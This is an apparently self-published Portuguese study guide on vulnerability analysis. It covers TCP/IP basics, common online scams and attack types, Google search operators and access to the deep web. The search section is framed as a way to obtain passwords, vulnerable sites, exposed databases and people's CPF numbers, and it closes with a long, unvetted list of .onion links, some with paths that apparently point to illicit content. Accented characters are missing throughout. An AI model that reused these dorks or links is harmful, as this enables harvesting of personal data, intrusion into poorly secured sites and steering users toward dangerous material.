Essa camada conhecida como camada fsica por
ter a responsabilidade de trata-se das tecnologias
usadas para conexes, por exemplo: Ethernet, WiFi,Modem, etc.
Camada responsvel pelas conexes entre as redes
locais, estabelecendo assim a interconexo.
Controla a comunicao host-a-host.
Contm todos os protocolos (TCP e UDP HTTP,
HTTPS, FTP, DNS, RTP etc.) Para servios
especficos de comunicao de dados em um nvel
de processo-a-processo (por exemplo: Ela
especifica como browser deve se comunicar com
um servidor da web etc.).

www.clubedohacker.com.br

27

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Mas a camada que mais interessa aos usurios a camada de
aplicao, onde milhares de pessoas ao redor do planeta utilizam o
protocolo HTTP para navegar em pginas e mais pginas em HTML.
O Modelo de referncia TCP/IP dividido pelas camadas de:
Aplicao; Transporte; rede; Fsica/Host, onde o HTTP um dos
protocolos mais utilizados na camada de aplicao e o protocolo
responsvel pela grande popularizao da Internet devido a sua
funcionalidade. Os passos para a comunicao via internet segue um
roteiro pr-determinado, onde;
1 - O usurio abre o navegador em seu computador, e digita um
endereo de uma pgina ex: www.clubedohacker.com.br;
2 - A requisio do endereo passada da camada de aplicao
camada de Fsica/Host transformando em impulsos de acordo com o
meio de comunicao.
3 - Ao chegar ao servidor do provedor, a requisio sobe todas as
camadas at a camada responsvel por processar a informao ou
repassar para qualquer outra maquina da Internet;
4 - A maquina para qual se destina a requisio finalmente processa
esta solicitao e envia no caminho inverso os dados do objeto
solicitado "www.clubedohacker.com.br".

www.clubedohacker.com.br

28

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
5 - Ao receber os dados da pagina que solicitou, o navegador do
cliente interpreta as informaes e comea a exibir a pagina na tela do
computador.

Tecnicamente isso bem simples; o grande problema por onde


passam os dados dos usurios, quem mantm a infraestrutura de
segurana para tais dados, considerando que a Internet est presente
na rotina da maioria da populao mundial e para essas pessoas seria
muito difcil viver sem a utilizao da internet, isso perfeitamente
compreensivo devido s facilidades nas comunicaes, a reduo de
custos e muitas outras razes que facilitam o dia a dia. Pois atravs da
Internet ns podemos encontrar antigos amigos, fazer novas
amizades, encontrar pessoas que compartilham das mesmas opinies,

www.clubedohacker.com.br

29

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
encontrar amigos e familiares distantes, ler jornais, fazer operaes
bancrias, utilizar os servios oficiais como tirar uma certido
negativa, cadastro para passaporte, compras dos mais diversos
produtos e muito mais.

Alm de todo o contedo que todos ns estamos acostumados a


encontrar atravs dos motores de busca como google, yahoo e outros,
existem tambm o que ns chamamos de Web Profunda Deep Web

Imagem extrada da internet (http://pt.wikipedia.org/wiki/Deep_web)


Que basicamente uma parte mais profunda da internet e que nossos

www.clubedohacker.com.br

30

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
motores de busca tradicionais no podem indexar, o que torna quase
invisvel ou inacessvel para quem no sabe que existe. Estima-se que
a web profunda mais de 500 vezes maior que o contedo da
superfcie. nessa parte da rede que reside o que chamamos de
submundo da Web, Exageros a parte, claro que no so somente
pedfilos, quadrilhas e terroristas que utilizam a web profunda.
Existem cientistas universidades, polcias, especialistas em TI,
hackers e muitos outros profissionais com conhecimento acima da
mdia que veem todo esse contedo. Ha inclusive empresas
especializados em Deep Web. A grande pergunta hoje como
navegar, utilizar todos esses servios com segurana ou ao menos
com o mnimo de segurana necessrios para que os dados essenciais
como CPF RG nmeros de carto de credito, dados de conta bancria
dos internautas no sejam sequestrados na rede?

Tcnicas utilizadas para roubo de dados


Quais so as tcnicas utilizadas para roubar dados de pessoas e
empresas, como so usadas, quais ferramentas, como saber se estamos
vulnerveis?
So essas perguntas que tentarei responder nessa obra e para isso irei
utilizar dos conhecimentos de mais de duas dcadas de experincia

www.clubedohacker.com.br

31

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
em analise de vulnerabilidades para descrever todos os passos do
inicio ao fim.

Quais riscos se tentam evitar com uma analise de


vulnerabilidades?
Alm de analisar os sistemas computacionais e a infraestrutura,
apresentar relatrios e sugestes importante dotar todos os
colaboradores da empresa contratante de informaes sobre as fraudes
cometidas com a utilizao da Internet. Isso pode ser feito pela
prpria equipe contratante ou equipe externa atravs de palestras
pontuais, demonstraes de fraudes etc. Pois um dos principais
ataques a engenharia social e normalmente disparado contra
usurios finais.

Erros cometidos pelos usurios finais e profissionais descuidados


Acesso a contedos imprprios ou ofensivos: Ao navegar voc
pode se deparar com pginas que contenham pornografia, que atentem
contra a honra ou que incitem o dio e ao racismo.
Contato com pessoas mal-intencionadas: existem pessoas que se
aproveitam da falsa sensao de anonimato da Internet para aplicar

www.clubedohacker.com.br

32

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
golpes, tentar se passar por outras pessoas e cometer crimes como,
por exemplo, estelionato, pornografia infantil e sequestro.
Sequestro de identidade: Assim como voc pode ter contato direto
com impostores, tambm pode ocorrer de algum tentar se passar por
voc e executar aes em seu nome, levando outras pessoas a
acreditarem que esto se relacionando com voc, e colocando em
risco a sua reputao.
Furto e perda de dados: Os dados presentes em seus equipamentos
conectados Internet podem ser furtados e apagados, pela ao de
ladres, atacantes e cdigos maliciosos, existem quadrilhas
especializadas nesse tipo de crime, no que chamamos de submundo
da Web.
Invaso de privacidade: A divulgao de informaes pessoais pode
comprometer a sua privacidade, de seus amigos e familiares e, mesmo
que voc restrinja o acesso, no ha como controlar que elas no sero
repassadas. Alm disto, os sites costumam ter polticas prprias de
privacidade e podem alter-las sem aviso prvio, tornando pblico
quilo que antes era privado.
Divulgao de boatos: As informaes na Internet podem se
propagar rapidamente e atingir um grande nmero de pessoas em um
curtssimo perodo de tempo.

www.clubedohacker.com.br

33

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Dificuldade de excluso: Aquilo que divulgado na Internet nem
sempre pode ser totalmente excludo ou ter o acesso controlado. Uma
opinio dada em um momento de impulso pode ficar acessvel por
tempo indeterminado e pode de alguma forma, ser usada contra voc
e acessada por diferentes pessoas, desde seus familiares at seus
chefes, prejudicando sua vida pessoal e profissional.
Dificuldade de detectar e expressar sentimentos: Quando voc se
comunica via Internet no h como observar as expresses faciais ou
o tom da voz das outras pessoas, assim como elas no podem
observar voc. Isto pode dificultar a percepo do risco e pode gerar
mal-entendido e interpretaes dbias.
Dificuldade de manter sigilo: No seu dia a dia possvel ter uma
conversa confidencial com algum e tomar cuidados para que
ningum mais tenha acesso ao que voc est falando. Na Internet isso
no ser possvel, pois as informaes iro trafegar por caminhos
desconhecidos ou mesmo ficar armazenada em equipamento com
falhas de segurana e outras pessoas podem ter acesso facilmente.
Uso excessivo: O uso desmedido da Internet, assim como de outras
tecnologias, pode colocar o seu emprego em risco, pois diminui sua
produtividade e isso afeta a sua vida social ou profissional.

Plgio e violaes de direitos autorais: A cpia, alteraes ou

www.clubedohacker.com.br

34

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
distribuio no autorizada de contedos e materiais protegidos pode
contrariar a lei de direitos autorais e resultar em problemas jurdicos e
em perdas financeiras. Mais o maior risco relacionado ao uso da
Internet o de voc achar que no corre riscos, pois supe que
ningum tem interesse em utilizar o seu computador ou que, entre os
diversos computadores conectados Internet, o seu dificilmente ser
localizado. justamente este tipo de pensamento que explorado
pelos atacantes, pois, ao se sentir seguro voc pode achar que no
precisa se prevenir esta iluso, infelizmente, na maioria dos casos
termina quando os primeiros problemas aparecem. Muitas vezes os
atacantes esto interessados em conseguir acesso a grandes
quantidades de computadores, Independente de quais ou de quem so,
e para isto, podem efetuar varreduras na rede e localizar grande parte
dos computadores conectados Internet, inclusive o seu. Basta um
problema de segurana em seu computador para torn-lo disponvel e
colocar em risco todos os seus dados e consequentemente sua falsa
sensao de segurana culminar em srios problemas. a partir da
que seus problemas comeam e pode ter certeza, voc ter muitas
dores de cabea se no souber o caminho a seguir.

Quais os principais golpes aplicados com a utilizao da Internet?


Normalmente, atacar e fraudar computadores e servidores de um
banco ou grande empresa no o que se pode chamar de tarefa

www.clubedohacker.com.br

35

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
simples devido o alto nvel de conhecimento das equipes de segurana
e resposta a incidentes dessas corporaes, investimentos em
equipamentos de proteo e diversas outras razes. nesse ponto que
os golpistas concentram os esforos nas fragilidades dos usurios
finais. Assim eles podem abusar das tcnicas de engenharia social,
eles tentam persuadir as potenciais vtimas a fornecerem informaes
sensveis ou a realizarem aes como executar cdigos maliciosos e
ou acessar pginas falsas que eles mesmos hospedaram na Web com
esse objetivo.
A maioria dos golpes aplicados pela Internet podem ser classificados
como crimes contra o patrimnio, tipificados como estelionato. Dessa
forma, o golpista pode ser considerado um estelionatrio.

Furto de identidade
O furto de identidade, o ato pelo qual uma pessoa tenta se passar por
outra, atribuindo-se uma falsa identidade, com o objetivo de obter
vantagens indevidas. Alguns casos de furto de identidade podem ser
considerados como crime contra a f pblica, tipificados como falsa
identidade. No seu dia a dia, sua identidade pode ser furtada, de posse
de todos os dados uma quadrilha pode cometer fraudes, por exemplo,
algum pode abrir uma empresa ou uma conta bancria usando seu
nome e seus documentos.
Na Internet isto tambm pode ocorrer, caso algum tenha acesso a

www.clubedohacker.com.br

36

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
seus dados e crie um perfil em seu nome em uma rede social, acesse
sua conta de e-mail e envie mensagens se passando por voc ou
falsifique os campos de e-mail, fazendo parecer que ele foi enviado
por voc.
Continue lendo, pois nessa obra voc aprender os caminhos a
percorrer caso sua identidade seja furtada, sem conhecimentos voc
certamente arcar com as graves consequncias por ter tido sua
identidade furtada. At que voc consiga reverter o caso a seu favor,
certamente j amargou muitos dissabores.

Fraude de antecipao de recursos


Certa vez eu Adonel Bezerra estava em uma agncia bancria
conversando com o gerente quando se aproximou uma senhora,
aproximadamente 65 anos, ofegante entregou seu carto ao gerente e
solicitou a liberao de um emprstimo no valor de R$ 6.000,00.
Enquanto o gerente interrompeu nossa conversa e pegou o carto para
consultar a conta, a senhora sentou em uma cadeira ao meu lado e
comeamos a conversar, ela estava muito feliz porque tinha recebido
um telefone de um escritrio de advocacia muito famoso com sede
em Braslia. Nesse telefonema foi lhe comunicado que ela receberia
R$ 192.356,00 referentes restituio do plano Collor. Que esse valor
era referente a uma ao coletiva movida em favor de todos os
brasileiros que tinha conta bancria no perodo Collor. Para receber

www.clubedohacker.com.br

37

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
tal liberao imediata em sua conta a referida senhora s deveria
pagar s custas do processo, no valor de R$ 5.811,00, valor esse que
deveria ser depositado imediatamente em uma conta bancria
fornecida pelo suposto escritrio de advocacia. Para demonstrar a
veracidade eles enviaram um documento por fax informando o valor
que j estava apenas para liberao imediata assim que s tais custas
do processo fosse depositada. Esse um caso real desse tipo de golpe,
pois a fraude de antecipao de recursos aquela na qual um golpista
procura induzir uma pessoa a fornecer informaes confidenciais ou a
realizar um pagamento adiantado, com a promessa de futuramente
receber algum tipo de benefcio, normalmente muito maior que a
irrisria quantia solicitada.
Isso se da por meio do recebimento de mensagens eletrnicas ou do
acesso a sites fraudulentos, a pessoa inventa uma histria mirabolante
e faz uma oferta irrecusvel, voc s teria que fornecer seus dados
pessoais ou mandar algum valor antecipado para o golpista e todos os
seus problemas seriam resolvidos.
H. A senhora, devidamente orientada, desistiu de tomar o
emprstimo, orientei que ela esperasse o dinheiro cair na conta para
poder pagar as tais custas e que procurasse a delegacia para registrar
um boletim de ocorrncia imediatamente.
Essa se livrou de uma divida de R$ 6.000,00 mais muita gente tem
cado nesse golpe.

www.clubedohacker.com.br

38

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Phishing
O phishing o tipo de fraude onde um golpista tenta obter dados
pessoais e financeiros de um usurio pela utilizao de tcnicas
combinadas de meios tcnicos, como envio de emails com cdigos
maliciosos e engenharia social.
Pharming
Pharming uma tcnica de phishing que envolve o redirecionamento
da navegao do usurio para sites falsos, normalmente por
intermdio de alteraes feitas no servio de DNS (Domain Name
System). Assim, quando o usurio tenta acessar um site legtimo, o
navegador Web de sua mquina redirecionado para uma pgina
falsa, o pior disso que isso ocorre de forma transparente, pois a
pgina falsa idntica verdadeira. No uma tcnica muito fcil,
porque envolve o comprometimento do servidor de DNS do provedor
de acesso a internet que o usurio utiliza, normalmente utilizando-se
da ao de cdigos maliciosos projetados para alterar o
comportamento do servio de DNS do computador.
Golpes de comrcio eletrnico
Os golpes de comrcio eletrnico so os preferidos pelas quadrilhas
no submundo da Web e tem o objetivo de se obter vantagens
financeiras, exploram a relao de confiana existente entre as partes

www.clubedohacker.com.br

39

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
envolvidas em uma transao comercial e podem se apresentar na
prtica de diversas formas. Um exemplo claro o site de comrcio
eletrnico fraudulento onde o golpista cria um site fraudulento, com o
objetivo de enganar os possveis clientes que, aps efetuarem os
pagamentos, nunca recebem as mercadorias.
Golpe envolvendo sites de compras coletivas: Os sites de compras
coletivas tambm tm sido largamente utilizados para aplicar esse
tipo de golpe. Para obter sucesso os golpistas costumam mandar
mensagens em nome dos sites verdadeiros, desta forma, tentam
induzir o internauta a acessar uma determinada pgina falsa e a
fornecer dados pessoais. Incluem-se ainda os golpes de sites de leiles

Boato
Um boato, ou hoax uma mensagem que possui contedo alarmante
ou falso e que, geralmente, tem como remetente, ou aponta como
autora, alguma instituio importante. muito utilizado nos golpes de
pirmide, correntes etc.
Tratei ate aqui dos golpes comuns contra usurios que navegam pela
internet. A seguir vamos tratar de forma detalhada dos ataques.
Ataques esses que no se resumem ao usurio final, mais a toda rede
de uma corporao ou mesmo a prpria Infraestrutura de internet.

Ataques disparados pela Internet

www.clubedohacker.com.br

40

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Os ataques costumam ocorrer na Internet com diversos objetivos,
visando diferentes alvos e usando tcnicas variadas. Qualquer servio,
computador ou rede que seja acessvel via Internet pode ser um alvo
em potencial de um determinado ataque, tambm qualquer
computador ligado Internet pode no apenas ser um alvo, mais
tambm participar de um ataque como zumbi.
Os motivos que levam um atacante ou grupo de atacantes a disparar
um ataque na Internet so bastante diversos, variando da simples
diverso at mesmo para o cometimento de atos ilcitos. Podem ser
motivados pela demonstrao de poder, Ganhar prestgio em
determinada comunidade quando pretende vangloriar-se perante
outros atacantes por ter conseguido invadir determinados
computadores ou redes ou mesmo deixar os servios inacessveis,
desfigurar sites considerados visados, disputar com outros atacantes
ou grupos de atacantes para revelar quem consegue realizar o
maior nmero de ataques ou ser o primeiro a conseguir atingir um
determinado alvo. Motivao financeira, ideologia dentre outras.

Explorao de vulnerabilidades
Uma vulnerabilidade definida como uma condio que, quando
explorada por um atacante, pode resultar em uma violao de
segurana. Um ataque de explorao de vulnerabilidades ocorre

www.clubedohacker.com.br

41

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
quando um atacante, utilizando-se de uma ou vrias vulnerabilidades
encontradas e tenta executar aes maliciosas ou no, como invadir
um sistema, acessar informaes confidenciais, disparar ataques
contra outros computadores ou tornar um servio indisponvel por
determinado tempo.

Varredura em redes
Varredura em redes, ou scan, uma tcnica que consiste em efetuar
buscas minuciosas em redes, com o objetivo de identificar
computadores ativos e coletar informaes sobre tais computadores,
informaes como, quais servios esto ativos, quais os programas
instalados, verses de sistemas etc. Baseados nessas informaes, um
atacante pode determinar se existem vulnerabilidades no sistema ou
nos servios instalados.

Falsificao de e-mail
A falsificao de e-mail uma tcnica que consiste em alterar campos
do cabealho de um e-mail, de forma a aparentar que ele foi enviado
de uma determinada origem quando, na verdade, foi enviado de outra.
Isso possvel devido a caractersticas prprias do protocolo SMTP
(Simple Mail Transfer Protocol) que permitem que campos do
cabealho, como From: (endereo de quem enviou a mensagem), e
Reply-To (endereo de resposta da mensagem) ou mesmo o

www.clubedohacker.com.br

42

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Return-Path (endereo para onde possveis erros no envio da
mensagem so enviados), sejam falsificados. Ataques deste tipo so
bastante usados para propagao de cdigos maliciosos, envio de
spam e em golpes de phishing.

Interceptao de trfego
A interceptao de trfego uma tcnica que consiste em inspecionar
os dados trafegados em segmentos de redes de computadores, por
meio do uso de programas especficos chamados de sniffers ou
analisadores de protocolos. Esta tcnica pode ser utilizada de forma
legtima dentro das empresas por administradores de redes, para
detectar problemas, analisar desempenho e monitorar atividades
maliciosas relativas aos computadores ou redes por eles
administrados, ou maliciosa, por atacantes com o objetivo de capturar
informaes sensveis, como senhas, nmeros de cartes de crdito e
o contedo de arquivos confidenciais que estejam trafegando por
meio de conexes sem criptografia.

Fora bruta
Um ataque de fora bruta, consiste em adivinhar, por tentativa e erro,
um nome de usurio e ou senha, assim pode-se executar processos e
acessar sites, computadores e servios utilizando-se das credenciais
de terceiro com os mesmos privilgios. Qualquer computador,

www.clubedohacker.com.br

43

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
equipamento de rede ou servio que seja acessvel via Internet e que
use um nome de usurio e senha, pode ser alvo de um ataque de fora
bruta.

Desfigurao de pgina
Desfigurao de pgina uma tcnica que consiste em alterar o
contedo da pgina Web de um site. As principais formas que um
atacante pode utilizar para desfigurar uma pgina Web so a
explorao de erros na aplicao Web; a explorao de
vulnerabilidades do servidor de aplicaes; a explorao de
vulnerabilidades da linguagem de programao ou dos pacotes
utilizados no desenvolvimento; O furto de senhas de acesso da rea de
administrao do site.

Negao de servios
A negao de servios, ou DoS (Denial of Service), uma tcnica
pela qual um atacante utiliza um ou vrios computadores para tirar de
operao um servio, um computador ou uma rede conectada a
Internet. Quando utilizada de forma coordenada e distribuda, ou seja,
quando um conjunto de computadores utilizado no ataque, recebe o
nome de negao de servio distribudo, ou DDoS (Distributed Denial
of Service). O objetivo destes ataques no invadir e nem coletar

www.clubedohacker.com.br

44

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
informaes, mas simplesmente causar indisponibilidade do sistema
alvo.
Penso que aqui fechamos essa parte conceitual sobre a introduo.

Navegando pela superfcie da Web


Em nossas vidas andamos por muitos lugares, lugares nunca antes
imaginados por nossa mente e mesmo assim passeamos e nos
maravilhamos com tudo que era antes desconhecido. Navegar na
Internet sempre nos trs os mesmos sentimentos exceto que na
Internet tudo acontece em alguns cliques.
A web ou rede mundial de computadores esconde muitas surpresas,
surpresas essas que os motores de busca tradicionais como google,
yahoo, bing e outros simplesmente no conseguem enxergar e sobre
essa web que iremos tratar agora. Mais vamos entender um pouco a
ideia de pesquisa como estamos acostumados, como se faz uma busca
na internet utilizando os motores de busca tradicionais.
Sempre que pensamos em fazer pesquisa na web o que vem logo a
nossa a mente? o google, claro! A ideia de ter mais de 1,5 bilho de
pginas reunidas em um nico local parece bem interessante. Atravs
dele nossas pesquisas ficam mais fceis, encontramos tudo que
precisamos desde que saibamos alguns operadores para orient-lo em

www.clubedohacker.com.br

45

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
nossas pesquisas, ou seja, temos que orientar o prprio sistema de
busca para filtrar o contedo que queremos buscar na web e isso
fcil, basta que dominemos alguns poucos operadores.
O Google umas das ferramentas mais fabulosas que existe, esse site
de busca to eficiente que todos sempre falam, Se no tem no
google, no existe na web mais creio que o correto seria afirmar
que, se no tiver no Google no est na superfcie da web" pois pode
perfeitamente estar na Deep Web.
O Google , essencialmente, um mecanismo de busca de palavras e
links pela Internet, utilizando diversos recursos de filtragem e
catalogao de resultados.
O que garantiu o sucesso do Google, em detrimento dos outros foram
seus algoritmos de extrao de dados, que tornam qualquer busca
muito mais rpida do que as buscas realizadas com os outros sistemas
de busca, sua interface limpa tambm foi um fator que contou a seu
favor, pois seu front-end composto apenas por texto e links em
HTML, o que o torna bem mais rpido em suas respostas,
considerando que suas exigncias de processamento so bem
menores.

www.clubedohacker.com.br

46

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

A lgica booleana
Outro diferencial fica por conta da engrenagem lgica do Google, que
utiliza a lgica booleana. Batizada assim para homenagear o
matemtico britnico George Boole, esse sistema estabelece a
possibilidade de busca de palavras em um texto, condicionando a
exibio de resultados a valores lgicos: Onde um valor deve ser
sempre verdadeiro ou falso; um valor no pode ser verdadeiro e falso
ao mesmo tempo; matematicamente verdadeiro pode ser definido
como 1, e falso, como 0.
Visando no delimitar a busca em demasia, so utilizados elementos
para incrementar as funes booleanas ou algoritmos de busca
utilizados pelo Google.

Desses elementos, os mais conhecidos so:


AND Esse delimitador utilizado para incluir, em uma expresso,
todos os elementos que sero propostos em uma consulta.

www.clubedohacker.com.br

47

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O Google no utiliza o delimitador AND de forma explcita: basta
digitar os termos separados por um espao para sua incluso na busca.
OR Delimitador de varivel. O OR (sempre em maiscula)
utilizado para encontrar pginas em que se encontre um ou outro
termo de uma busca.
NOT (-) Esse operador utilizado para suprimir um determinado
termo de uma busca, servindo como um filtro de contedo.
ASPAS ( ) As aspas so utilizadas na lgica booleana para
garantir que uma expresso completa ou um conjunto de termos seja
includa na busca.
Outros delimitadores de busca
Imagine que voc deseja obter o mximo de informaes sobre um
determinado site, deseja conseguir senhas, encontrar sites vulnerveis
e at conseguir senhas de bancos de dados voc pode com o google,
desde que esteja na superfcie da web.

Alguns exemplos de pesquisa.

Digitando: clubedohacker o google mostra apenas


resultados que tenha exatamente a palavra clubedohacker.
Primeiros comandos (operadores):
Intext:clubedohacker: (onde clubedohacker o texto desejado)
com esse comando possvel visualizar todas paginas que contem o
texto clubedohacker.

www.clubedohacker.com.br

48

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Intitle:adonel: com esse comando possvel visualizar todas as


paginas que contem como titulo a palavra adonel.

Inurl:adonel: Aqui sero exibidas todas as pginas que contem


na url a palavra adonel.
Hacker site:br: (onde br a sigla do pas desejado) com esse
comando podemos pesquisar sites de um determinado pas, ou
tambm de um tipo determinado, por exemplo:
site:gov: para sites do governo
site:org: para sites de instituies
site:mil: para sites militares e assim por diante, esse tipo de filtragem
muito interessante e veremos que utilizaremos bastante isso pra
melhorar nossa filtragem.
Ex: tcpip site:com.br - Busca sites .com.br que contm tcpip
Filetype: tipo (onde tipo o tipo de arquivo podendo ser .doc .rar .jpg
.xls .mdb etc)
Ex: Hacker filetype:doc Busca arquivos com nome hacker.doc
(documento do word)
Para pegar um cpf basta digital: Cpf+adonel Busca todos adonel e
numero de cpf

www.clubedohacker.com.br

49

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O google tambm pode efetuar clculos, basta saber os operadores
lgicos.
(+) soma (-) subtrai (/) diviso (*) multiplicao
Para fazer uma conta basta digitar a conta e teclar enter:
46*2 - o google exibiria 92 como resultado, para o algoritmo do
google isso tudo normal.
Servindo como scanner
Inurl:admin.asp: com esse comando o google mostra paginas de
login criadas em asp.
Inurl:/login/index.asp :gov.br: Nesse comando o google traz todas
paginas do governo brasileiro que tenha pagina de login em asp.
index of: esse comando retorna paginas que no estejam indexadas.
*.mdb :com.br "index of: busca de sites .com.br que no estejam
indexados.
"ftp.txt" :.com.br "index of: o resultado aqui ser a busca e
apresentao de sites com arquivo ftp.txt.

www.clubedohacker.com.br

50

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Navegando pela web profunda
O google no consegue ver todo contedo da WEB;

A internet que muitos no veem!


Mais o que mesmo essa deep web? - Bem, basicamente uma parte
mais profunda da internet que nossos motores de busca no podem
indexar o que torna quase invisvel ou inacessvel para quem no sabe
que existe.
Estima-se, (mais sem nenhuma comprovao) que quase 20 mil
terabytes em mais de 950 bilhes de documentos indisponveis para
acesso via mecanismos de busca. Um site para ser indexado,
normalmente precisam apenas que seja habilitada as Funes

www.clubedohacker.com.br

51

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
follow e nofollow o que define se voc quer ou no ter seu
contedo indexado pelos robs dos mecanismos de busca. Tem
tambm o arquivo robots.txt para configurao manual. Para navegar
na deep web voc ir necessitar de um navegador especial, pois nem o
Internet Explorer nem o Firefox ir exibir seu contedo.
Motores de busca: Existem inmeros motores de busca para a
superfcie da web, mais que no servem para deep web por suas
limitaes. Voc pode comear utilizando o TOR

O Tor oferece uma plataforma, chamada de Onion, onde os


desenvolvedores podem construir novos aplicativos baseados em
anonimato, com mais segurana e privacidade.

www.clubedohacker.com.br

52

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Ele traz seu prprio navegador ligado a uma rede de proxy onde uma
informao trafega por vrios computadores pertencente a rede tor at
chegar no destino. Isso significa que voc ir acessar a deep web de
forma annima, mais alguns cuidados so necessrios, como nunca
fornecer dados pessoais reais; ter um email na deep web pra se
cadastrar nos grupos etc.

www.clubedohacker.com.br

53

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Vamos acessar alguns sites da deep web para servir como exemplo
apenas. Vale ressaltar que nessa camada da Internet no existem
somente bandidos, existe muito contedo melhor que na superfcie
inclusive. Vale muito a pena conhecer e explorar essa rea. Outra
vantagem de voc navegar na deep web o fato de estar sempre
atualizado sobre as aes, os planos de ataque etc. Estando navegando
constantemente nela voc ter maiores chances de agir e defender sua
rede, bem com de seus clientes.
Tor Mail - o Tor Mail um servio de email criado e totalmente
mantido na Deep Web. Com encriptao refinada e segurana mxima,
o endereo de email com o qual dever se identificar sempre que se
inscrever em fruns ou semelhantes na Deep Web. A inscrio gratuita
e seu email ser do gnero: email@tormail.org.

www.clubedohacker.com.br

54

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Tipo de URL: http://jhiwjjlqpyawmpjx.onion/

The Hidden Wiki - O website mais popular e acessado na Deep Web.


Com a mesma interface utilizada pela Wikipdia, completamente open
source, permite a criao de clones de sua interface, no serve
exatamente como dicionrio e enciclopdia, mas sim como um
diretrio, atravs dela voc poder ter acesso a centenas de links, com
as descries dos websites separados por categorias.

URL: http://kpvz7ki2v5agwt35.onion/

www.clubedohacker.com.br

55

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

URL:
http://552egj2iappsjjdu.onion/Backup/Turorial_Como%20manter
se%20seguro%20e%20oculto%20na%20DW_byNeoHackerZ.txt

Circle- Uma excelente base onde voc pode criar painis de


discusso, entrar em painis j existentes, hospedar imagens, criar uma
comunidade SnapBBS etc. URL: http://4eiruntyxxbgfv7o.onion/

www.clubedohacker.com.br

56

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Busca por Pessoas - pipl.com/

www.clubedohacker.com.br

57

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Essas imagens comprovam que as coisas aontecem livremente na


deep web

www.clubedohacker.com.br

58

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Listei aqui algumas Urls da deep web para que voc possa comear
Download: http://jntlesnev5o7zysa.onion/
Buscadores

www.clubedohacker.com.br

59

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

http://ahmia.fi/
http://dppmfxaacucguzpc.onion/
http://xmh57jrzrnw6insl.onion/
http://3g2upl4pq6kufc4m.onion/
Para buscar torrentes: http://sc3njt2i2j4fvqa3.onion/
http://4eiruntyxxbgfv7o.onion/
http://am4wuhz3zifexz5u.onion/
http://627kx22vati6uqkw.onion/
http://hkfjbmo2rdjun56b.onion/ (onionchan, dead)
http://kpynyvym6xqi7wz2.onion/files.html
http://4eiruntyxxbgfv7o.onion/snapbbs/736364f4/showthread.php?&t
hreadid=0bf8a39efd46fd7dd67dc3a1 d0291860

www.clubedohacker.com.br

60

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
http://kpvz7ki2v5agwt35.onion/wiki/index.php/Main_Page (hidden
wiki)
http://627kx22vati6uqkw.onion/
http://4eiruntyxxbgfv7o.onion/pm/
http:// kpvz7ki2v5agwt35.onion
http://7cov2loswjrmaqot secret corner
http://6x77gb7ngu6nymwl.onion
http://opva2pilsncvtwmh.onion
http://7cov2loswjrmaqot.onion
http://eqt5g4fuenphqinx.onion/
http://b4yrk2nkydqfpzqm.onion/girls/topic/1045+full/
http://m3hjrfh4hlqc67gb.onion/inliner.php?num=50&size=120&filter
=0
http://kpvz7ki2v5agwt35.onion/wiki/index.php/Main_Page
http://opva2pilsncvtwmh.onion/
http://b4yrk2nkydqfpzqm.onion/
http://lph5po3mivnjjzjo.onion/kusaba.php
